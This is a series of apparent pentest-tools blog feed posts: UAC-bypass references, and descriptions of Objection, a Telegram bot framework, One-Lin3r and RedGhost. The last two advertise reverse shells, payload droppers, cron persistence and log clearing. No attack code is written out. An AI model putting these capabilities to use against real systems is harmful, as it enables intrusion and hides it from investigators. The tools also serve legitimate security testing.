blog, https://blogs.msdn.microsoft.com/junfeng/Beyond good ol’ Run key, series of articles, http://www.hexacorn.com/blogKernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643Command Injection/Elevation – Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited"Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/Using IARPUninstallStringLauncher COM interface to bypass UAC, http://www.freebuf.com/articles/system/116611.htmlBypassing UAC using App Paths, https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/"Fileless" UAC Bypass using sdclt.exe, https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.htmlFirst entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/Reading Your Way Around UAC in 3 parts: https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.htmlhttps://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.htmlhttps://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.htmlResearch on CMSTP.exe, https://msitpros.com/?p=3960UAC bypass via elevated .NET applications, https://offsec.provadys.com/UAC-bypass-dotnet.htmlUAC Bypass by Mocking Trusted Directories, https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6eYet another sdclt UAC bypass, http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypassUAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking, https://egre55.github.io/system-properties-uac-bypass/Accessing Access Tokens for UIAccess, https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.htmlFileless UAC Bypass in Windows Store Binary, https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.htmlAuthors(c) 2014 – 2019 UACMe ProjectDownload UACME

Link: http://feedproxy.google.com/~r/PentestTools/~3/SVc2u0HEg4k/uacme-defeating-windows-user-account.html

Objection v1.6.6 – Runtime Mobile Exploration

objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.featuresSupporting both iOS and Android and having new features and improvements added regularly as the tool is used in real world scenarios, the following is a short list of only a few key features:For all supported platforms, objection allows you to:Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.Interact with the filesystem, listing entries as well as upload & download files where permitted.Perform various memory related tasks, such as listing loaded modules and their respective exports.Attempt to bypass and simulate jailbroken or rooted environments.Discover loaded classes and list their respective methods.Perform common SSL pinning bypasses.Dynamically dump arguments from methods called as you use the target application.Interact with SQLite databases inline without the need to download the targeted database and use an external tool.Execute custom Frida scripts.iOS specific features in objection include the ability to:Dump the iOS keychain, and export it to a file.Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.Dump various formats of information in human readable forms.Bypass certain forms of TouchID restrictions.Watch for method executions by targeting all methods in a class, or just a single method.Monitor the iOS pasteboard.Dump encoded .plist files in a human readable format without relying on external parsers.Android specific features in objection include the ability to:List the applications Activities, Services and Broadcast receivers.Start arbitrary Activities available in the target application.Watch a class method, reporting execution as it happens.screenshotsThe following screenshots show the main objection repl, connected to a test application on both an iPad running iOS 10.2.1, and Samsung Galaxy S5 running Android 6.A file system listing of the iOS applications main bundleA file system listing of the Android applications bundleiOS Keychain dumped for the current application, and later written to a file called keychain.jsonInline SQLite query toolSSL Pinning bypass running for an iOS applicationSSL Pinning bypass running for an Android applicationAPI usage to list the currently stored iOS sharedHTTPCookieStoragesample usageA sample session, where objection version 0.1 is used to explore the applications environment. Newer versions have the REPL prompt set to the current applications name, however usage has remained the same: prerequisitesTo run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.As for the target mobile applications though, for iOS, an unencrypted IPA is needed and Android just the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project.installationInstallation is simply a matter of pip3 install objection. This will give you the objection command.For more detailed update and installation instructions, please refer to the wiki page here.Download Objection

Link: http://feedproxy.google.com/~r/PentestTools/~3/_lHkwuwDics/objection-v166-runtime-mobile.html

Tourmaline – Telegram Bot Framework For Crystal

Telegram Bot (and hopefully soon Client) API framework for Crystal. Based heavily off of Telegraf this Crystal implementation allows your Telegram bot to be written in a language that’s both beautiful and fast. Benchmarks coming soon.If you want to extend your bot by using NLP, see my other library Cadmium.InstallationAdd this to your application’s shard.yml:dependencies: tourmaline: github: watzon/tourmaline version: ~> 0.7.0UsageBasic usagerequire “tourmaline/bot"alias TGBot = Tourmaline::Botbot = TGBot::Client.new(ENV["API_KEY"])bot.command(["start", "help"]) do |message| text = "Echo bot is a sample bot created with the Tourmaline bot framework." bot.send_message(message.chat.id, text)endbot.command("echo") do |message, params| text = params.join(" ") bot.send_message(message.chat.id, text)endbot.pollListening for eventsTourmaline has a number of events that you can listen for (the same events as Telegraf actually). The full list of events is as can be found in the documentation.bot.on(:text) do |update| text = update.message.not_nil!.text.not_nil! puts "TEXT: #{text}"endAdding middlewareMiddleware can be created by extending the Tourmaline::Bot::Middleware class. All middleware classes need to have a call(update : Update) method. The middleware will be called on every update.class MyMiddleware < TGBot::Middleware # All middlware include a reference to the parent bot. # @bot : Tourmaline::Bot::Client def call(update : Update) if message = update.message if user = message.from_user if text = message.text puts "#{user.first_name}: #{text}" end end end endendbot.use MyMiddlewareWebhooksUsing webhooks is easy, even locally if you use the ngrok.cr package.# bot.pollbot.set_webhook("https://example.com/bots/my_tg_bot")bot.serve("0.0.0.0", 3400)# or with ngrok.crrequire "ngrok"Ngrok.start({ addr: "127.0.0.1:3400" }) do |ngrok| bot.set_webhook(ngrok.ngrok_url_https) bot.serve("127.0.0.1", 3400)endPaymentsYou can now accept payments with your Tourmaline app! First make sure you follow the setup instructions here so that your bot is prepared to handle payments. Then just use the send_invoice, answer_shipping_query, and answer_pre_checkout_query methods to send invoices and accept payments.bot.command("buy") do |message, params| bot.send_invoice( message.chat.id, "Sample Invoice", "This is a test...", "123344232323", "YOUR_PROVIDER_TOKEN", "test1", "USD", bot.labeled_prices([{label: "Sample", amount: 299}, {label: "Another", amount: 369}]).to_json )endGamesAbility to create and run games with your Tourmaline Bot is a recent feature that hasn't been tested yet. Please use the issue tracker if you experience problems.Kemal MiddlewareTourmaline provides middleware for Kemal, just in case you want to use Kemal as the server.require "kemal"require "tourmaline/kemal/tourmaline_handler"require "./your_bot"add_handler Kemal::TourmalineHandler.new( bot: YourBot.new, url: "https://something.com", path: "/bot-webhook/#{ENV["TGBOT_API_KEY"]}")Kemal.runNote: Telegram won't send webhook requests to non-ssl domains. This means that you need to be running your kemal server with ssl enabled. For local development this can be a pain, but it is made much easier with ngrok.cr.DevelopmentThis currently supports the following features:Bot API Implementation examplesEasy command syntaxRobust middleware systemStandard API queriesStickersInline modeLong pollingWebhooksPaymentsGamesClient API (in development)If you want a new feature feel free to submit an issue or open a pull request.ContributingFork it ( https://github.com/watzon/tourmaline/fork )Create your feature branch (git checkout -b my-new-feature)Commit your changes (git commit -am 'Add some feature')Push to the branch (git push origin my-new-feature)Create a new Pull RequestContributorswatzon Chris Watson - creator, maintainerDownload Tourmaline

Link: http://feedproxy.google.com/~r/PentestTools/~3/b2eIBVRuc7c/tourmaline-telegram-bot-framework-for.html

One-Lin3r v2.0 – Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More

One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won’t even need to copy the one-liners).ScreenshotsIt consists of various one-liners types with various functions, some of them are: One-liner function What this function refers to Reverse Shell Various methods and commands to give you a reverse shell. PrivEsc Many commands to help in Enumeration and Privilege Escalation Bind Shell Various methods and commands to give you a bind shell. Dropper Many ways to download and execute various payload types with various methods. Features A lot of liners use with different purposes, currently are more than 155 liner. The auto-complete feature that has been implemented in this framework is not the usual one you always see, here are some highlights: It’s designed to fix typos in typed commands to the most similar command with just one tab click so seach becomes search and so on, even if you typed any random word similar to an command in this framework.For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.Finally, you’ll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc… Automation You can automatically copy the liner you want to clipboard with command copy instead of using use <liner> and then copying it which saves a lot of time, of course, if you merged it with the following features.As you may noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.There are history and resource commands so you don’t need to exit the framework.You can execute as many commands as you want at the same time by splitting them with semi-colon.Searching for any liner here is so easy, you can search for a liner by its name, function or even the liner author name. You can add your own liners by following these steps to create a liner as a python file. After that you can make a Pull request with it then it will be added in the framework and credited with your name of course . The ability to reload the database if you added any liner without restarting the framework. You can add any platform to the liners database just by making a folder in liners folder and creating a “.liner" file there. More… Note: The liners database is not too big but it will get bigger with updates and contributions.Usagef Command-line argumentsusage: one-lin3r [-h] [-r R] [-x X] [-q]optional arguments: -h, –help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). -q Quiet mode (no banner).Framework commandsCommand Description——– ————-help/? Show this help menu.list/show List all one-liners in the database.search [Keywords..] Search database for a specific liner by its name, author name or description.use <liner> Use an available one-liner.copy <liner> Use an available one-liner and copy it to clipboard automatically.info <liner> Get information about an available liner.set <variable> <value> Sets a context-specific variable to a value to use while using one-liners.variables Prints all previously specified variables.banner Display banner.reload/refresh Reload the liners database.check Prints the core version and checks if you are up-to-date.history Display command-line most important history from t he beginning.makerc Save command-line history to a file.resource <file> Run the commands stored in a fileos <command> Execute a system command without closing the frameworkexit/quit Exit the frameworkPrerequisites before installingPython 3.x.Any OS, it should work on all but it’s tested on Kali 2018+, Ubuntu 18+, Windows 10, Android with termux and MacOs 10.11Installing and runningUsing pip (The best way to install on any OS):pip install one-lin3rone-lin3r -hInstalling it from GitHub: For windows : (After downloading ZIP and upzip it)python -m pip install ./One-Lin3r-masterone-lin3r -hFor Linux :git clone https://github.com/D4Vinci/One-Lin3r.gitapt install libncurses5-devpip3 install ./One-Lin3rone-lin3r -hUpdating the framework or the databaseIf you installed it from pip do:pip install one-lin3r –upgradeIf you installed it from github do: On Linux while outside the directorycd One-Lin3r && git pull && cd ..pip3 install ./One-Lin3r –upgradeOn Windows if you don’t have git installed, redownload the framework zipped!Note: As the liners are written as python modules, it considered as a part of the framework. So every new liner added to the framework, its version will get updated.ContactTwitterTelegramCredits and referencesPayloadsAllTheThingsPowerSploit repoarno0x0x – Windows oneliners to download remote payload and execute arbitrary codeDownload One-Lin3r

Link: http://feedproxy.google.com/~r/PentestTools/~3/tpDLaHMBIEQ/one-lin3r-v20-gives-you-one-liners-that.html

RedGhost – Linux Post Exploitation Framework Designed To Gain Persistence And Reconnaissance And Leave No Trace

Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.Payloads Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perlCrontab Function to create cron job that downloads and runs payload every minute for persistenceClearlogs Function to clear logs and make investigation with forensics difficultMassInfoGrab Function to grab mass information on systemBanIp Function to BanIpDownload RedGhost

Link: http://feedproxy.google.com/~r/PentestTools/~3/Gy75mmZWdEY/redghost-linux-post-exploitation.html